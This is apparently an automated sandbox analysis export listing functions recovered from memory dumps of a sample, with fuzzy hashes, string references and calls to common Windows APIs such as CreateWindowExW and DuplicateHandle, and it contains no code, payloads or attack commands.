Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID: ^3
API String ID: 0-4131431691
Opcode ID: 03c23dee1e2ff9724a25b2ff91f34696a23c7b374414822120600f2795809a8d
Instruction ID: 4b79166c45c4937be5d27c629b55e1f448f69a32c533878e2342e9513af93665
Opcode Fuzzy Hash: 03c23dee1e2ff9724a25b2ff91f34696a23c7b374414822120600f2795809a8d
Instruction Fuzzy Hash: A5A1F6B4E00208CFEB10DFA5C984BDDBBB2FF89304F209269E449A7291DB759985CF54

Function 33870C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

^3, xrefs: 33870C99

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID: ^3
API String ID: 0-4131431691
Opcode ID: f66598916f7f9698d13c83b95230d8564d720f91899f0a225da7d268deacecd2
Instruction ID: b4667bda78a2ea70288806692b31e22b894fa8f503202c8815acf106257a9903
Opcode Fuzzy Hash: f66598916f7f9698d13c83b95230d8564d720f91899f0a225da7d268deacecd2
Instruction Fuzzy Hash: D9A105B4D00208CFEB10DFA5C944BDDBBB2FF89314F209269E419AB2A1DB749985CF54

Function 00159048 Relevance: .9, Instructions: 902COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b4adbbc77e045d6b57d14b74f5b821b2ac32adff939a1d2296b7bbe3825753
Instruction ID: e225aae4120e5fd8c4bb0ee98621843b6cc4d88e19c7df4c98e0292c429e78f0
Opcode Fuzzy Hash: 84b4adbbc77e045d6b57d14b74f5b821b2ac32adff939a1d2296b7bbe3825753
Instruction Fuzzy Hash: 8C824D70A04209DFCB15CF68C984AAEBBF2FF88311F158559E8159F261D730ED89CB62

Function 3627E7C8 Relevance: .8, Instructions: 764COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862cddde58dfa46048d9a09bb4d46ac7873be1455e5d57dfd0b8d98b76d20401
Instruction ID: a7d3507d380dc1c86d7358151cebcd8f36861f99e048565201b3f5ec0fe373bf
Opcode Fuzzy Hash: 862cddde58dfa46048d9a09bb4d46ac7873be1455e5d57dfd0b8d98b76d20401
Instruction Fuzzy Hash: 9B82D438A01229CFDB65DF24C994B99B7B2FF89300F1081E9D909A7365CB319E82DF54

Function 35AFBDF0 Relevance: .8, Instructions: 758COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228884fd4ebd03243b62ab8fe6ac02eaf7a5872cfb55d5613128364ee940f57e
Instruction ID: 61d7f4ba323f4f08a795bf965f3356fe6fddad2d9c0482f7bef863903e4ca557
Opcode Fuzzy Hash: 228884fd4ebd03243b62ab8fe6ac02eaf7a5872cfb55d5613128364ee940f57e
Instruction Fuzzy Hash: D472E338A01219CFDB65DF65C994B99B7B2FB89300F1081E9E909B7365CB319E82DF44

Function 35AF8650 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2debb8b2067cdac42667653fa75cf289b418534e0250b22962dd8e4d83abce
Instruction ID: 400b62a6a17c2300b58f7220a77eb7d05f3d4d6da53211430c38b2ed73af6abc
Opcode Fuzzy Hash: cc2debb8b2067cdac42667653fa75cf289b418534e0250b22962dd8e4d83abce
Instruction Fuzzy Hash: 8C72B274E052298FEB64DF69C980BDDBBB2BB49300F5081E9D849A7351DB319E82DF50

Function 00155F90 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe19a5b4363cff5fa898d8bcac30a72686c816753daac5309b13cb3146f11dbd
Instruction ID: 58f60f02dd698d4f0f70153eac18c84ed129fa0deba5cce529c6aa61883a903c
Opcode Fuzzy Hash: fe19a5b4363cff5fa898d8bcac30a72686c816753daac5309b13cb3146f11dbd
Instruction Fuzzy Hash: 27124130A00219DFCB54CF69C984AADBBF2FF88316F958055E825EB261DB30DC85CB90

Function 3387C638 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c9e59b87b4b1cb948de3477a23fd6cfaa12af73d0692d01c10d6f6584e25d0
Instruction ID: 12f6302c9cd22cd6977ee5ecd2652594911cf29e73975546468151f5c631e3e0
Opcode Fuzzy Hash: c5c9e59b87b4b1cb948de3477a23fd6cfaa12af73d0692d01c10d6f6584e25d0
Instruction Fuzzy Hash: C0E1B074E01218CFEB54CFA5C844B9DBBB2BF89300F2081AAD419B7391DB355A86CF54

Function 338703AF Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7927cd2c5b8a66c2ff0839b8598be6b2dc032b47f61c0106d7057265398cbd
Instruction ID: 75f25732f8b24766baadf31857e320da8cf54cf4e662b28633c10ad331b8483f
Opcode Fuzzy Hash: dd7927cd2c5b8a66c2ff0839b8598be6b2dc032b47f61c0106d7057265398cbd
Instruction Fuzzy Hash: FFD19174E01218CFEB54DFA5C954B9DBBB2BF88300F1081A9D809BB355DB359A86CF50

Function 35AF1400 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf36ae1b660e35a304851320ff8f03650375f9dc7d774903f700e8c581b2d6bb
Instruction ID: 65554853cd83eab6f4a20e736e6b89d4693f18721f84444f9d89621dc77d3c6f
Opcode Fuzzy Hash: cf36ae1b660e35a304851320ff8f03650375f9dc7d774903f700e8c581b2d6bb
Instruction Fuzzy Hash: EEC1B074E01258CFDB54DFA9C994B9DBBB2BF89300F2080A9D819BB355DB359A81CF50

Function 35AF9D10 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f7093c1d083357179f9d3a22d348ba9ec66ab86bdf6afec628549a38065e7a
Instruction ID: 5bc9e47a2ed62da54b84a0ab2852abb8d4eb08abe6b4d8d450387878ff9bae51
Opcode Fuzzy Hash: 48f7093c1d083357179f9d3a22d348ba9ec66ab86bdf6afec628549a38065e7a
Instruction Fuzzy Hash: 54A192B4E052188FEB24CF6AC944B9DBBF2BF89300F14C1AAD80DA7251DB755A85CF51

Function 35AFA360 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01a261589e378cf706ecdb9ae665d820389c5a5335cd8335a4e97af2cdbc304
Instruction ID: 3b8e96059d7b767f8beaf5327e93d6a3e780e6f816ea879d21ce7e7f28483d61
Opcode Fuzzy Hash: a01a261589e378cf706ecdb9ae665d820389c5a5335cd8335a4e97af2cdbc304
Instruction Fuzzy Hash: F7A191B5E012188FEB24CF6AC944BDDBBF2BB89300F14C0AAD809A7255DB755A85CF51

Function 35AF96C8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0075602b08b47082c3807a93c6a6d552cddbc4a0006b828d7bd3a088d5759ed1
Instruction ID: 93e8cfcb25649d5a23812bdc17af83dba74203c3ccd49a7829cc140f07aa693c
Opcode Fuzzy Hash: 0075602b08b47082c3807a93c6a6d552cddbc4a0006b828d7bd3a088d5759ed1
Instruction Fuzzy Hash: F6A1A1B4E052188FEB24CF6AD944B9DBBF2BF89300F14C0AAD80CA7251DB315A85CF51

Function 35AFA9B0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ffa802e76a9efaa4b9aaab2bd3ad2021b7f6c9da5b09d453db8588fac3d9bf
Instruction ID: 5872ea2738d6122912e1f321ddd1acd8572ddfecad00475d4824790f6377af26
Opcode Fuzzy Hash: a5ffa802e76a9efaa4b9aaab2bd3ad2021b7f6c9da5b09d453db8588fac3d9bf
Instruction Fuzzy Hash: 35A191B4E012188FEB24CF6AC944BDDBBF2BB89300F14C1AAD809B7255DB755A85CF51

Function 33870F6F Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e15d1e27d0fc0cc175e57f331fe55f3a4e3df3d8c408530ecddaada6d0699b6c
Instruction ID: c7f8a25119e9561da4551fb6c11daa2a34b047891a2d901242b5a2a0b0c0a08c
Opcode Fuzzy Hash: e15d1e27d0fc0cc175e57f331fe55f3a4e3df3d8c408530ecddaada6d0699b6c
Instruction Fuzzy Hash: F991D2B4D00208CFEB10DFA8C984BDCBBB2FF49311F209259E449AB291DB759986CF54

Function 00154328 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28331a0b2f4845f2e5db95bda427367941bcbb35b79fe798f2281c19cb94fa1a
Instruction ID: 78bbe885b6bfb192260f411d82f271d9553dbb9d7a89675ccf721393323d2bf1
Opcode Fuzzy Hash: 28331a0b2f4845f2e5db95bda427367941bcbb35b79fe798f2281c19cb94fa1a
Instruction Fuzzy Hash: 1F91D674E00218CFEB14DFA9D884A9DBBF2BF89305F14C169D819AB365DB309985CF50

Function 35AFBA97 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3379b37aebc441d737d243b19fb6bb01f5f40b3979e708402fc11af06d1854c6
Instruction ID: 2cdc42593ad8a5cd894136f579bfb4833fa0b8b7a8f29a8423269d33531f1dea
Opcode Fuzzy Hash: 3379b37aebc441d737d243b19fb6bb01f5f40b3979e708402fc11af06d1854c6
Instruction Fuzzy Hash: 3281C674E00648CBEB14DFAAD940A9EBBF2BF88314F24D129E814BB355DB355942DF50

Function 35AF8640 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e1c0f7c181dc5aaec845b09547e42d8476d1fc4133c905daa39aeb128eeafe
Instruction ID: 6bbe29bd2a4a5fe01db2931a6e58022ad1193b27e42882bc6673357a638de2dd
Opcode Fuzzy Hash: 28e1c0f7c181dc5aaec845b09547e42d8476d1fc4133c905daa39aeb128eeafe
Instruction Fuzzy Hash: A271A275D05628CFDB64DF6AC984BDDBBB2BF89301F1091AAD809A7350DB355A82CF40

Function 35AFA9A0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06fde4a069ab4121f0830873dfe7d9306550f9c4c16ee98138f0fe27427d6e63
Instruction ID: 9f0b9244afcb7a3d0ef01d0271d3188793aa1bba88e9e11ddde3238f0f04b1b9
Opcode Fuzzy Hash: 06fde4a069ab4121f0830873dfe7d9306550f9c4c16ee98138f0fe27427d6e63
Instruction Fuzzy Hash: D67187B5E016188FEB68CF66C944B9DFAF2BF88300F14C1AAD80DA7255DB345A85CF51

Function 35AF96B8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a43e28569e45518c5dd0f1db90eb802f21dadae29079cd52de9e052727efd74
Instruction ID: 6b8212444c301f11ede16191098b73edac6426d92d8d6b374a55835c2765b7a0
Opcode Fuzzy Hash: 7a43e28569e45518c5dd0f1db90eb802f21dadae29079cd52de9e052727efd74
Instruction Fuzzy Hash: 867195B5D056188FEB68CF6AC944B9DBBF2BF88300F14C1AAD40DA7255DB304A85CF50

Function 3627F316 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc6b6e0f5f4313cf698779b1e4928f14707fc89c234f184308e62d23b207767
Instruction ID: 2288bca28d7799c7affe616e284ae72b08d053653d2b3e30244fcd06f1ce42ac
Opcode Fuzzy Hash: 7cc6b6e0f5f4313cf698779b1e4928f14707fc89c234f184308e62d23b207767
Instruction Fuzzy Hash: 0361D738A0021ADFEB25DF64C854BADBBB6EB88300F1080A9991977755DF319D82EF54

Function 35AF9D00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d17040f9466a668e916431a79da0c88185875ca2147108e56b2aefd45bacff5
Instruction ID: 3572972de2ca15ee34bc3e2e6e02511a4b17a8a70cb7f4900fff78c0399a6ea1
Opcode Fuzzy Hash: 9d17040f9466a668e916431a79da0c88185875ca2147108e56b2aefd45bacff5
Instruction Fuzzy Hash: 4A415FB1E016188BEB58CF67CD457DAFAF3AFC9300F14C1AAD50CA6264DB7509868F51

Function 35AFA351 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f926dac9c42f48f550f7426e285bc36e9c1dcc26dbd612b11bee32af78ca86
Instruction ID: 405a1387ad436b158aa6aa2b5e24273433edb37292072adc8f118ef462c798ee
Opcode Fuzzy Hash: 83f926dac9c42f48f550f7426e285bc36e9c1dcc26dbd612b11bee32af78ca86
Instruction Fuzzy Hash: 91415BB1D016188BEB58CF6BCD457C9FBF3AFC9200F04C1AAD50CA6254DB740A858F55

Function 00157458 Relevance: 25.7, Strings: 20, Instructions: 708
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.C]3, xrefs: 0015786E
.C]3, xrefs: 001577E4
.C]3, xrefs: 001578D0
.C]3, xrefs: 001574D9
.C]3, xrefs: 00157532
.C]3, xrefs: 001578B3
.C]3, xrefs: 00157646
.C]3, xrefs: 0015779F
.C]3, xrefs: 00157483
.C]3, xrefs: 00157829
.C]3, xrefs: 0015775A
.C]3, xrefs: 0015749D
.C]3, xrefs: 001574F6
NC]3, xrefs: 00157471
.C]3, xrefs: 0015768B
.C]3, xrefs: 00157577
.C]3, xrefs: 001575BC
.C]3, xrefs: 00157601
.C]3, xrefs: 001576D0
.C]3, xrefs: 00157715

Memory Dump Source

Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID: .C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$NC]3
API String ID: 0-2504479211
Opcode ID: c5bccf8623dd0eb77f992ab2a259b1f6943c5bd82b684ef3162e47d36387be99
Instruction ID: 205f26858b5351bff82075f923b13b40350b5d3ed4fa44262375ba2499474d15
Opcode Fuzzy Hash: c5bccf8623dd0eb77f992ab2a259b1f6943c5bd82b684ef3162e47d36387be99
Instruction Fuzzy Hash: 39522134A0021DCFEB14DBA4C861B9EBB76EF85300F1081AAD51A7B3A5CF359E859F51

Function 36270970 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 362709FE
GetCurrentThread.KERNEL32 ref: 36270A3B
GetCurrentProcess.KERNEL32 ref: 36270A78
GetCurrentThreadId.KERNEL32 ref: 36270AD1

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e0ff3d7a0b30d71222c72dcdf007e4c9ed1b6f4cb73282e3ffa493627f3f4b2b
Instruction ID: 1b61500854db13bb98432158b6dad207a67529391981be4d56eddc4ec7998f42
Opcode Fuzzy Hash: e0ff3d7a0b30d71222c72dcdf007e4c9ed1b6f4cb73282e3ffa493627f3f4b2b
Instruction Fuzzy Hash: EA5167B090030A8FEB04CFAAD544BDEBBF5EF88300F208459E519B7361DB749945CB66

Function 36270980 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 362709FE
GetCurrentThread.KERNEL32 ref: 36270A3B
GetCurrentProcess.KERNEL32 ref: 36270A78
GetCurrentThreadId.KERNEL32 ref: 36270AD1

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4f0641fe52120b9cf6598bbfa903477d9ddcd62ffeb2bd12d555f3ce29e16ea0
Instruction ID: 4c8d27bd0c81d2ba897a8db38d271fa6cadae9af1650c8eb8821c8cbdebadc14
Opcode Fuzzy Hash: 4f0641fe52120b9cf6598bbfa903477d9ddcd62ffeb2bd12d555f3ce29e16ea0
Instruction Fuzzy Hash: C75137B090070A8FDB04CFAAD544BDEBBF5EF88310F208459E519B7361DB749945CB66

Function 362700B0 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 519bfa32a51aee31c509a4183411a41725c7d54a39aa6aeba0643a18b51585e8
Instruction ID: 98115bca44b4755de987ea5edc62ef3ce0fa4ade4adb7dbc0f2815951f233455
Opcode Fuzzy Hash: 519bfa32a51aee31c509a4183411a41725c7d54a39aa6aeba0643a18b51585e8
Instruction Fuzzy Hash: 765102B5C10249EFDF01CF99C880ACEBFB6BF49300F25816AE918AB221D7719855CF90

Function 36270104 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4eb98efdc8f4981de3f89158d407af598d502cb7ef5939b0970724937e3703cb
Instruction ID: b458451fd5b79fca749fc957d0477eeef6e244d9f34090e735d557ade4b354b5
Opcode Fuzzy Hash: 4eb98efdc8f4981de3f89158d407af598d502cb7ef5939b0970724937e3703cb
Instruction Fuzzy Hash: 0651CEB5D10349DFDB14CFA9C884ADEBBB5BF88310F65822AE818AB211D7749845CF90

Function 36270110 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 60c2482e7cb83b98d32fcccd7b75c5d692c42ba0f1c9a0cc7df3091ee98ea054
Instruction ID: 03ebdd816bc03eec681b08dbb6a965b010e69d72316009fcda2d914e26fc1717
Opcode Fuzzy Hash: 60c2482e7cb83b98d32fcccd7b75c5d692c42ba0f1c9a0cc7df3091ee98ea054
Instruction Fuzzy Hash: A341CFB5D10349DFDB14CF9AC880ADEBBB5BF48350F65812AE818AB211D7749845CF90

Function 36271DC0 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 36271E81

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5b5668712fcca86a0f28b09de627b953d9cde0cacfa425abc9659b931c1fb07a
Instruction ID: 591024c3fc43af72cfc80c84d0f8b9095c948849f01b4f1372b8a670201fab2e
Opcode Fuzzy Hash: 5b5668712fcca86a0f28b09de627b953d9cde0cacfa425abc9659b931c1fb07a
Instruction Fuzzy Hash: 02411AB8A10309CFDB14CF95C448E9AFBF5FF88314F258459E918AB321D734A941CBA0

Function 36270BC0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36270C4F

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6cb0ef9dde946a15405b94e6de65159efdb63ac23e21f932ca40ac252b2030c9
Instruction ID: 90941edff36fb8d1525ca0c8074e394514e829a5ee8431b1a82d9f58449ed313
Opcode Fuzzy Hash: 6cb0ef9dde946a15405b94e6de65159efdb63ac23e21f932ca40ac252b2030c9
Instruction Fuzzy Hash: 7621E6B5900209DFDB10CFAAD984ADEFBF8EF48310F24841AE958A3350D374A954CFA5

Function 36270BC8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36270C4F

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9c1f6daef284b7ef3b35df52e0c9709ba0313a39e1dca3a4715d6686bf81fb9
Instruction ID: be4b5004b778a60ceb52dbda29999f59650847e62d631c36de3c9921bdeffb09
Opcode Fuzzy Hash: a9c1f6daef284b7ef3b35df52e0c9709ba0313a39e1dca3a4715d6686bf81fb9
Instruction Fuzzy Hash: B621E4B5900209DFDB10CFAAD984ADEFBF4EF48320F24801AE958A3350D374A954CFA5

Function 3627E700 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3627D92F), ref: 3627E765

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 55430f6bd914146ac06216f4ad01f5112bd94929c56125911b5465fc435a41aa
Instruction ID: 20198f385aa4dfa656c6cda7c3f4ac5d28b6c105f642e19a197b0fbd34047e5f
Opcode Fuzzy Hash: 55430f6bd914146ac06216f4ad01f5112bd94929c56125911b5465fc435a41aa
Instruction Fuzzy Hash: F111FEB5C04649CFDB10CFAAD944BCEFBF4AB48324F20851AD958B7251C378A544CFA5

Function 36272018 Relevance: 1.5, APIs: 1, Instructions: 47
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,?,?,?), ref: 3627207D

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

